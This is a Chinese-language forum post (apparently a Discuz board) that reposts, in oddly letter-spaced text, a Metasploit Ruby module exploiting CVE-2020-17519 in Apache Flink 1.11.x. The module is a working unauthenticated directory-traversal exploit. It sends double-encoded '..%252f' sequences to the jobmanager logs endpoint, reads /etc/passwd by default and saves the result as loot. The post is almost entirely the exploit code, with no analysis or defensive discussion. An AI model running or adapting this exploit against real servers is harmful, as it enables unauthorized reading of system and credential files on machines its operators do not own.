搜索

[28722] 2021-01-10_ApacheFlink1.11.0任意文件读取目录遍历

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-01-10_ApacheFlink1.11.0任意文件读取目录遍历 A p a c h e   F l i n k   1 . 1 1 . 0 / O t s   2 0 2 1 - 0 1 - 1 0 h t t p s : / / c x s e c u r i t y . c o m / i s s u e / W L B - 2 0 2 1 0 1 0 0 7 6 # # #   T h i s   m o d u l e   r e q u i r e s   M e t a s p l o i t :   h t t p s : / / m e t a s p l o i t . c o m / d o w n l o a d #   C u r r e n t   s o u r c e :   h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k # # c l a s s   M e t a s p l o i t M o d u l e   <   M s f : : A u x i l i a r y         i n c l u d e   M s f : : E x p l o i t : : R e m o t e : : H t t p C l i e n t         i n c l u d e   M s f : : A u x i l i a r y : : S c a n n e r         i n c l u d e   M s f : : A u x i l i a r y : : R e p o r t             d e f   i n i t i a l i z e ( i n f o   =   { } )                     s u p e r ( u p d a t e _ i n f o (                         i n f o ,                         ' N a m e '                       = >   ' A p a c h e   F l i n k   F i l e   R e a d   V u l n e r a b i l i t y ' ,                         ' D e s c r i p t i o n '         = >   % q {                                 T h i s   m o d u l e   e x p l o i t s   a n   u n a u t h e n t i c a t e d   d i r e c t o r y   t r a v e r s a l   v u l n e r a b i l i t y                                 i n   A p a c h e   F l i n k   v e r s i o n   1 . 1 1 . 0   ( a n d   r e l e a s e d   i n   1 . 1 1 . 1   a n d   1 . 1 1 . 2   a s   w e l l ) ,                                 a l l o w i n g   a r b i t r a r y   f i l e   r e a d   w i t h   t h e   w e b   s e r v e r   p r i v i l e g e s                         } ,                         ' A u t h o r '                   = >                             [                                 ' 0 r i c h 1   -   A n t   S e c u r i t y   F G   L a b ' ,   #   V u l n e r a b i l i t y   d i s c o v e r y                                 ' H o a   N g u y e n   -   S u n c s r   T e a m ' ,         #   M e t a s p l o i t   m o d u l e                             ] ,                         ' L i c e n s e '                 = >   M S F _ L I C E N S E ,                         ' R e f e r e n c e s '           = >                             [                                 [ ' C V E ' ,   ' 2 0 2 0 - 1 7 5 1 9 ' ] ,                                 [ ' U R L ' ,   ' h t t p : / / w w w . o p e n w a l l . c o m / l i s t s / o s s - s e c u r i t y / 2 0 2 1 / 0 1 / 0 5 / 2 ' ] ,                                 [ ' U R L ' ,   ' h t t p s : / / w w w . t e n a b l e . c o m / c v e / C V E - 2 0 2 0 - 1 7 5 1 9 ' ]                             ] ,                         ' P r i v i l e g e d '           = >   f a l s e ,                         ' P l a t f o r m '               = >   [ ' p h p ' ] ,                         ' A r c h '                       = >   A R C H _ P H P ,                         ' T a r g e t s '                 = >   [ [ ' ' ,   { } ] ] ,                         ' D e f a u l t T a r g e t '     = >   0 ,                         ' D i s c l o s u r e D a t e '   = >   ' J a n   0 5   2 0 2 1 '                         ) )                         r e g i s t e r _ o p t i o n s ( [                                 O p t I n t . n e w ( ' D E P T H ' , [ t r u e , ' T r a v e r s a l   D e p t h ' , 1 2 ] ) ,                                 O p t S t r i n g . n e w ( ' F I L E P A T H ' , [ t r u e , ' T h e   p a t h   f i l e   t o   r e a d ' , ' / e t c / p a s s w d ' ] )                         ] )                         e n d                         d e f   r u n _ h o s t ( i p )                                 t r a v e r s a l   =   ' . . % 2 5 2 f '   *   d a t a s t o r e [ ' D E P T H ' ]                                 f i l e n a m e   =   d a t a s t o r e [ ' F I L E P A T H ' ] . g s u b ( " / " , " % 2 5 2 f " )                                 f i l e n a m e   =   f i l e n a m e [ 1 ,   f i l e n a m e . l e n g t h ]   i f   f i l e n a m e   = ~   / ^ / /                                 r e s   =   s e n d _ r e q u e s t _ c g i ( {                                         ' m e t h o d '   = >   ' G E T ' ,                                         ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h , ' j o b m a n a g e r ' , ' l o g s ' , " # { t r a v e r s a l } # { f i l e n a m e } " ) ,                                 } )                                 f a i l _ w i t h   F a i l u r e : : U n r e a c h a b l e ,   ' C o n n e c t i o n   f a i l e d '   u n l e s s   r e s   f a i l _ w i t h   F a i l u r e : : N o t V u l n e r a b l e ,   ' C o n n e c t i o n   f a i l e d .   N o t h i n g n   w a s   d o w n l o a d e d '   i f   r e s . c o d e   ! =   2 0 0                                 f a i l _ w i t h   F a i l u r e : : N o t V u l n e r a b l e ,   ' N o t h i n g   w a s   d o w n l o a d e d .   C h a n g e   t h e   D E P T H   p a r a m e t e r '   i f   r e s . b o d y . l e n g t h . z e r o ?                                 p r i n t _ s t a t u s ( ' D o w n l o a d i n g   f i l e . . . ' )                                 p r i n t _ l i n e ( " n # { r e s . b o d y } n " )                                     f n a m e   =   d a t a s t o r e [ ' F I L E P A T H ' ]                                     p a t h   =   s t o r e _ l o o t (                                     ' a p a c h e . t r a v e r s a l ' ,                                     ' t e x t / p l a i n ' ,                                     i p ,                                     r e s . b o d y ,                                     f n a m e                                 )                                 p r i n t _ g o o d ( " F i l e   s a v e d   i n :   # { p a t h } " )                         e n d                 e n d

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理